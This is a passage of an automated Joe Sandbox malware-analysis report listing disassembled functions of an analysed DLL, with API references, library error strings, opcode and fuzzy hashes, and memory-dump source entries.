                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                                                                                                                                                                              • String ID: CryptoMaterial: this object does not support precomputation
                                                                                                                                                                                                                                              • API String ID: 2192554526-3625584042
                                                                                                                                                                                                                                              • Opcode ID: 75b7f1ef397e82f44c74af34801146657e72639f132f8eb5a7e9294d2a95476e
                                                                                                                                                                                                                                              • Instruction ID: 5d430297ca29a3dacdd12606718e3392fbac5cdb21451ff188632ed17992a95a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75b7f1ef397e82f44c74af34801146657e72639f132f8eb5a7e9294d2a95476e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09316171C04248AFCB14CF98D840BDEFBB8FB15714F60866EE52597B90DB75AA08CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE3317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE3327
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CEE336B
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 1735018483-3788999226
                                                                                                                                                                                                                                              • Opcode ID: d03d0c14663f12e58acb87377e3c722ae4d6a71afe267eb64509ee8bbed3a0c9
                                                                                                                                                                                                                                              • Instruction ID: 8c240d4f30bbd655a6ab4fbb092a3bcf70de85a53ea39330247e9a2d63c3a2e0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d03d0c14663f12e58acb87377e3c722ae4d6a71afe267eb64509ee8bbed3a0c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F631C975A00215AFCB24DF94D8C0F9AB7B0EB49358F205679E9199BB90DB31BD04C7A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF5810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CEF584D
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 6CEF5899
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 2677079660-3788999226
                                                                                                                                                                                                                                              • Opcode ID: dba95558e3d8f6f21e95d4e976fae3acfa044826295f9415492c0a3da5350918
                                                                                                                                                                                                                                              • Instruction ID: a29e68ad34e757a1ad314f57f49b3c8e0f46bb77a44dc4b884743805d0214985
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dba95558e3d8f6f21e95d4e976fae3acfa044826295f9415492c0a3da5350918
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F121C871A01609AFD710CF6CD880A5EBBF5FF54324F248A3DE469D3B40DB34A9058B90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE5750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CEE576B
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CEE5782
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                              • API String ID: 963545896-2556327735
                                                                                                                                                                                                                                              • Opcode ID: 857bc83fa2df479d398e5cc0a59b1f6d6d171164b57347f89d22d87fe9274fd3
                                                                                                                                                                                                                                              • Instruction ID: 747979ea27f405f506c461edccbc3164ad51129529ead789765faa2380a1f577
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 857bc83fa2df479d398e5cc0a59b1f6d6d171164b57347f89d22d87fe9274fd3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D911DA733057109FD321DA5DE880A6AF7F9EF99764F70061FE552C7B50CB61981483A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED46B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED46C4
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CED470B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                              • API String ID: 1785806476-2556327735
                                                                                                                                                                                                                                              • Opcode ID: 681204ca73fd7a8e517723b74be795eb5e0d3b11e59fa96ed51afe47d5bc73b0
                                                                                                                                                                                                                                              • Instruction ID: 68ced8911ae2c2439720bb29b27c3c08e854ab3a32ca67d8d73800afa9e8c34b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 681204ca73fd7a8e517723b74be795eb5e0d3b11e59fa96ed51afe47d5bc73b0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4311EC721047145FE7209F78A8C0A6AB7B8AF61318F350B2FE49783A81D731B4498762
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF04D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF04E00
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • ArraySink: missing OutputBuffer argument, xrefs: 6CF04D91
                                                                                                                                                                                                                                              • OutputBuffer, xrefs: 6CF04D77
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                                                                                                                                                                                                                              • API String ID: 3718517217-3781944848
                                                                                                                                                                                                                                              • Opcode ID: d33a133e3d236b073889d707350a1bd19609ffb3e3fc1111a61be2520d2e256f
                                                                                                                                                                                                                                              • Instruction ID: 92e21d4d325d2215bf0d3079bfc859f827e2a0ffd44db521287b100ed4e1da50
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d33a133e3d236b073889d707350a1bd19609ffb3e3fc1111a61be2520d2e256f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 513129B1508390AFC310CF69C490A9BBBF4BB99714F508E1EF5A987B50DB75D908CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE0150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE0201
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • OutputStringPointer, xrefs: 6CEE018C
                                                                                                                                                                                                                                              • StringSink: OutputStringPointer not specified, xrefs: 6CEE019B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                                                                                                                                                                                                              • API String ID: 3718517217-1331214609
                                                                                                                                                                                                                                              • Opcode ID: 1ad000ded80ee7110fd5b36e8a3703d3433b9bfbe9762d9eb271e49e6c48e291
                                                                                                                                                                                                                                              • Instruction ID: ca7500c24deb3f2f05c76f0c90e472e691cf0e37a6f05ce579db6ff07ed1d91c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ad000ded80ee7110fd5b36e8a3703d3433b9bfbe9762d9eb271e49e6c48e291
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D219271D04248AFCB04CFD8D880BDDFBB4EB19304F10865EE425A7B91DB356A18CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED4620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4636
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: std::exception::exception.LIBCMT ref: 6CF3913A
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: __CxxThrowException@8.LIBCMT ref: 6CF3914F
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: std::exception::exception.LIBCMT ref: 6CF39160
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CED466F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • invalid string position, xrefs: 6CED4631
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                                                              • API String ID: 1785806476-1799206989
                                                                                                                                                                                                                                              • Opcode ID: 7c91d924c04c3b29d839e3d70f37daa58a66d538ed4c4b5c875068f4efdda42d
                                                                                                                                                                                                                                              • Instruction ID: d5afcbe98fd7bb6f6c4d605bc9854fbf7eca044703839277a101aeab3ad9cdfd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c91d924c04c3b29d839e3d70f37daa58a66d538ed4c4b5c875068f4efdda42d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F201C8713046505BD3208F5CDC80A5AB3B6DBE1754B35492AE1A6C7F05DAB1FC4383A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF0ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator!=.LIBCMT ref: 6CF0ACF8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: type_info::operator!=
                                                                                                                                                                                                                                              • String ID: Modulus$PublicExponent
                                                                                                                                                                                                                                              • API String ID: 2241493438-3324115277
                                                                                                                                                                                                                                              • Opcode ID: 314971f4bdf62a8afece3fbf7636c35e2ddeb2d52ee461f266125ecf0a7be79a
                                                                                                                                                                                                                                              • Instruction ID: a375b0ae1383fee4b2d55db19ae48fcb0ecce91729bda4e39a3d6e5dc4c5d1a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 314971f4bdf62a8afece3fbf7636c35e2ddeb2d52ee461f266125ecf0a7be79a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C211CE31B09304AFC600DF39885098BFBE4AFE6A48F01461EF4845BB61EB31D948CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF2B7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator!=.LIBCMT ref: 6CF2B848
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: type_info::operator!=
                                                                                                                                                                                                                                              • String ID: Modulus$PublicExponent
                                                                                                                                                                                                                                              • API String ID: 2241493438-3324115277
                                                                                                                                                                                                                                              • Opcode ID: 047420abe9ee7cce157ccbaf687569cfdcf046114a5d512995e3d82a02e49ede
